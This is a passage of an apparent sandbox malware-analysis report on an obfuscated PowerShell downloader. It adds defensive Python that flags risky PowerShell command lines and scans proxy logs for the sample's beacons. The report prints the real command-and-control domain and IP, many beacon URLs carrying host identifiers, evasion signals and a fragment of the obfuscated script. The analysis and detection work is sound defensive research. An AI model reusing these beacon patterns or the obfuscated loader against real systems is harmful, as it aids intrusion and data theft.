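    # posix=False keeps Windows paths intact (backslash is not an escape) and groups quoted args
    tokens = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    result = {"execution_policy": None, "insecure_policy": False,
              "hidden_window": False, "encoded_command": False, "script_file": None}
    for i, tok in enumerate(tokens):
        name = _param_name(tok)
        if name is None:
            continue
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if _is_param(name, "executionpolicy", ("ep", "ex", "exec")):
            result["execution_policy"] = nxt.lower() or None
            result["insecure_policy"] = nxt.lower() in INSECURE_POLICIES
        elif _is_param(name, "windowstyle", ("w",)):
            result["hidden_window"] = nxt.lower() == "hidden"
        elif _is_param(name, "encodedcommand", ("e", "ec", "enc")):
            result["encoded_command"] = True
        elif _is_param(name, "file", ("f",)):
            result["script_file"] = nxt or None
    return result


def flagged(cmdline: str) -> bool:
    """True when the command line downgrades the execution policy or hides its window."""
    r = assess_powershell_cmdline(cmdline)
    return r["insecure_policy"] or r["hidden_window"]


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(flagged(line), assess_powershell_cmdline(line))
```

Execution policy is not a security boundary (the script can be fed through stdin or `-Command` without changing it), so the value of this check is as a triage signal that pairs well with the parent process and the script path; here the parent is unknown and the script was run from the user's Desktop.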

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical events)
Opening the BitLocker module manifest on its own is consistent with PowerShell's module auto-discovery, which reads every manifest under $env:PSModulePath to resolve a command name; the report shows no BitLocker cmdlet being run, so this row carries little weight by itself.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (119 identical events)

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB6CAAD sldt word ptr [ecx-47h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5471
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4350
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D16000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine!",
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine`S
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C1598000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware8
Source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
MITRE ATT&CK Matrix (techniques listed per tactic; the number in parentheses is the count of matching signatures, techniques without a number had no hits):

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet
Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Windows Management Instrumentation (2), PowerShell (1), At, Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading (1), Boot or Logon Initialization Scripts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Privilege Escalation: Process Injection (1), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (131), Process Injection (1), Obfuscated Files or Information (1), DLL Side-Loading (1), Software Packing, Steganography
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: Security Software Discovery (21), Process Discovery (1), Virtualization/Sandbox Evasion (131), Application Window Discovery (1), File and Directory Discovery (2), System Information Discovery (11)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Command and Control: Encrypted Channel (1), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (12), Fallback Channels, Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop
Source | Detection | Scanner | Label
download.ps1 | 11% | ReversingLabs |
download.ps1 | 13% | Virustotal |
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 172.217.19.228 | true | false | | high
cmacnnkfbhlcncm.top | 45.61.136.138 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527 | false | | unknown
http://www.google.com/ | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.19.228 | www.google.com | United States | 15169 | GOOGLEUS | false
45.61.136.138 | cmacnnkfbhlcncm.top | United States | 40676 | AS40676US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579457
Start date and time: 2024-12-22 13:41:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: download.ps1
Detection: MAL
Classification: mal76.evad.winPS1@2/7@2/2
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 14
  • Number of non-executed functions: 3
Cookbook Comments:
  • Found application associated with file extension: .ps1
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6884 because it is empty
                                                                                                               • Not all processes were analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                               Time      Type             Description
                                                                                                               07:42:04  API Interceptor  47x Sleep call for process: powershell.exe modified
                                                                                                               Match: 45.61.136.138
                                                                                                               Associated Sample Name / URL  Detection  Threat Name  Context
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/yudn6r4exvhtr.php?id=computer&key=71902578316&s=527
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/5jmw10tyqfhtr.php?id=user-PC&key=113750624201&s=527
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/o019zcxwsfhtr.php?id=user-PC&key=94248264203&s=527
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/lbs39er51ghtr.php?id=computer&key=31400257058&s=527
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/cmx2nrhlu7htr.php?id=computer&key=24412706494&s=527
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/57fd316pguhtr.php?id=computer&key=75439930857&s=527
                                                                                                               download.ps1                  malicious  Unknown      cmacnnkfbhlcncm.top/rz932vog4whtr.php?id=user-PC&key=63562548914&s=527
                                                                                                               Match: cmacnnkfbhlcncm.top
                                                                                                               Associated Sample Name / URL  Detection  Threat Name  Context
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               Match: AS40676 (US)
                                                                                                               Associated Sample Name / URL  Detection  Threat Name  Context
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               la.bot.mipsel.elf             malicious  Mirai        107.160.112.122
                                                                                                               QCTYoyX422.dll                malicious  Unknown      107.160.131.254
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               download.ps1                  malicious  Unknown      45.61.136.138
                                                                                                               loligang.ppc.elf              malicious  Mirai        23.179.110.68
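The context rows above share one beacon shape: an HTTP GET to cmacnnkfbhlcncm.top (45.61.136.138, AS40676) for a path of ten lowercase alphanumerics followed by htr.php, with exactly the query parameters id=<sandbox host name such as computer or user-PC>, key=<digits> and s=527. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that turns those observations into a scan over proxy log lines. The log format (timestamp, client IP, method, URL, status) and every line except the two URLs copied from the table are constructed for the example; the host, path and query checks are scored separately so the rule also catches the same beacon on a host that is not yet on the blocklist.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Indicators taken from the context tables of the report.
KNOWN_C2_HOSTS = {"cmacnnkfbhlcncm.top", "45.61.136.138"}
# Every observed path is ten lowercase alphanumerics followed by "htr.php".
C2_PATH = re.compile(r"^/[a-z0-9]{10}htr\.php$")

# Constructed proxy log lines: "<timestamp> <client> <method> <url> <status>".
# The first two URLs are copied from the context table; the other lines are
# made-up benign traffic so the scan has something to ignore.
LOG_LINES = [
    "2024-12-22T13:42:08 192.168.2.4 GET http://cmacnnkfbhlcncm.top/kzqvgnd7b0htr.php?id=computer&key=74093808379&s=527 200",
    "2024-12-22T13:42:09 192.168.2.4 GET http://cmacnnkfbhlcncm.top/4sqjhclnathtr.php?id=user-PC&key=146061803000&s=527 200",
    "2024-12-22T13:42:09 192.168.2.4 GET http://www.google.com/ 200",
    "2024-12-22T13:43:10 192.168.2.7 GET http://example.org/index.php?id=42&key=abc 200",
]


def classify_url(url: str) -> list:
    """Return the reasons a URL looks like this beacon (empty list if none).
    Host, path and query shape are checked independently, so a fresh domain
    serving the same path and query layout is still reported."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    query = parse_qs(parts.query)
    reasons = []
    if host in KNOWN_C2_HOSTS:
        reasons.append("known C2 host")
    if C2_PATH.match(parts.path):
        reasons.append("10-char random name + htr.php")
    if (set(query) == {"id", "key", "s"}
            and query["s"] == ["527"]
            and query["key"][0].isdigit()):
        reasons.append("id/key/s=527 query shape")
    return reasons


def scan_log(lines) -> list:
    """Run classify_url over log lines; return one hit dict per flagged line."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line; not this example's concern
        timestamp, client, _method, url, _status = fields[:5]
        reasons = classify_url(url)
        if reasons:
            hits.append({"ts": timestamp, "src": client, "url": url, "reasons": reasons})
    return hits
```

Requiring s=527 together with the htr.php path keeps the query check from firing on ordinary id/key parameters, and a hit that carries only the path and query reasons is the signal that the actor has moved to a new host. The TCP packet table further down shows the same client, 192.168.2.4, opening port 80 to 45.61.136.138, which is the connection these requests ride on.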
                                                                                                              No context
                                                                                                              No context
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlllulfj+l/Z:NllUa
                                                                                                              MD5:AEC655F8EE3DD3150DA36365EB66C091
                                                                                                              SHA1:3E4FCCFC1CE43B9802B56898F261467781DB1D33
                                                                                                              SHA-256:9E9E998CAC647B8C511C01A7983633D5DB70C5EC748AD488FE78898A89AB6270
                                                                                                              SHA-512:D98A7A562D940B4DCDA2ECB91DAC0046FD635425E8CF2A8A0646D693050C6A26BB0D704197DCE51E8EDFDD7EBC322B89E1D5FDEB76189B2CF523A0490473F9E0
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:@...e................................................@..........
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6221
                                                                                                              Entropy (8bit):3.7159553476630633
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:/I+98SPLPr3C4U28zojJbukvhkvklCywEmdJqRyugYT2loQ7SogZoptVtLpqRyuj:gqP33CxH84kvhkvCCtdZtnEHGZtnbHQ
                                                                                                              MD5:02E21EEE84AF66A7C5914FD894F305E4
                                                                                                              SHA1:8FB39B59AAF170AB715DAE406E13DAB1CE8F5A7A
                                                                                                              SHA-256:64E3202F4B426A835AAC95B1C69023BF66F25E08485218104AD70DA41C50957F
                                                                                                              SHA-512:A2BBD2B57D8F53DC9F032538CEA1B0FE0EA84D82C6E552FC5C58369871BAC9DAC6D683AE731BF8D52395AAF789C4513BE8819BB7E541B3471B1468AE94FECBF7
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...-/.v.....N~.nT..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....=...nT......nT......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y@e...........................%..A.p.p.D.a.t.a...B.V.1......Y<e..Roaming.@......CW.^.Y<e..........................W...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.YAe..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWS`..Windows.@......CW.^DWS`..........................8X0.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.YAe....Q...........
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6221
                                                                                                              Entropy (8bit):3.7159553476630633
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:/I+98SPLPr3C4U28zojJbukvhkvklCywEmdJqRyugYT2loQ7SogZoptVtLpqRyuj:gqP33CxH84kvhkvCCtdZtnEHGZtnbHQ
                                                                                                              MD5:02E21EEE84AF66A7C5914FD894F305E4
                                                                                                              SHA1:8FB39B59AAF170AB715DAE406E13DAB1CE8F5A7A
                                                                                                              SHA-256:64E3202F4B426A835AAC95B1C69023BF66F25E08485218104AD70DA41C50957F
                                                                                                              SHA-512:A2BBD2B57D8F53DC9F032538CEA1B0FE0EA84D82C6E552FC5C58369871BAC9DAC6D683AE731BF8D52395AAF789C4513BE8819BB7E541B3471B1468AE94FECBF7
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...-/.v.....N~.nT..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....=...nT......nT......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y@e...........................%..A.p.p.D.a.t.a...B.V.1......Y<e..Roaming.@......CW.^.Y<e..........................W...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.YAe..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWS`..Windows.@......CW.^DWS`..........................8X0.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.YAe....Q...........
                                                                                                              File type:ASCII text, with very long lines (10807), with CRLF line terminators
Entropy (8bit): 5.967537423142359
TrID:
File name: download.ps1
File size: 20'400 bytes
MD5: f710ad70e1fe42d5174f289867a61f93
SHA1: 5d2c8485c88fef6f88db24094b6b39f1628825a7
SHA256: d9eb14b6a8ce5658354baad69321096594b107cfa096fb7468d8f1c9c02487e5
SHA512: 7ed8d3e11da5c1f5b0f86190e852ce9e3fa98c07101c22110f108c7a4bf1339a6b4f696bc35a309d0c9542ec464580962dc08ebeb52620c63387c48b7a566f11
SSDEEP: 384:ydnyLO8CeZInjVd9bhy2WjuyV1ljr7pwL8f4nqfxnTCtxn:ydyS3eZUdxnk1lqL8wnqJy
TLSH: 33925CA17B84E8E4C29AC23F5607FC183B6A753BD0DBBBC4F658D6D163916112E8DC80
File Content Preview: $yfnvsdrmbckahu=$executioncontext;$edinbereonreenarateran = ([ChAR[]]@((-9940+(15808-(54346990/(13314-(-160+(19740096/4782)))))),(-3882+(9853-5919)),(6133-(156+(10342-(12421-(8910886/(-5446+6560)))))),(-9511+(4532+5029)),(2970-2914),(-285+(-5554+(7623-173
Icon Hash: 3270d6baae77db44
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-22T13:42:07.577435+0100 | 2859391 | ETPRO MALWARE TA582 Domain in DNS Lookup | 1 | 192.168.2.4 | 64577 | 1.1.1.1 | 53 | UDP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 22, 2024 13:42:07.577435017 CET | 64577 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2024 13:42:07.977735043 CET | 53 | 64577 | 1.1.1.1 | 192.168.2.4
Dec 22, 2024 13:42:09.368364096 CET | 62367 | 53 | 192.168.2.4 | 1.1.1.1
Dec 22, 2024 13:42:09.506589890 CET | 53 | 62367 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 22, 2024 13:42:07.577435017 CET | 192.168.2.4 | 1.1.1.1 | 0x1251 | Standard query (0) | cmacnnkfbhlcncm.top | A (IP address) | IN (0x0001) | false
Dec 22, 2024 13:42:09.368364096 CET | 192.168.2.4 | 1.1.1.1 | 0xcab | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 22, 2024 13:42:07.977735043 CET | 1.1.1.1 | 192.168.2.4 | 0x1251 | No error (0) | cmacnnkfbhlcncm.top | | 45.61.136.138 | A (IP address) | IN (0x0001) | false
Dec 22, 2024 13:42:09.506589890 CET | 1.1.1.1 | 192.168.2.4 | 0xcab | No error (0) | www.google.com | | 172.217.19.228 | A (IP address) | IN (0x0001) | false

• cmacnnkfbhlcncm.top
• www.google.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 45.61.136.138 | 80 | 6884 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

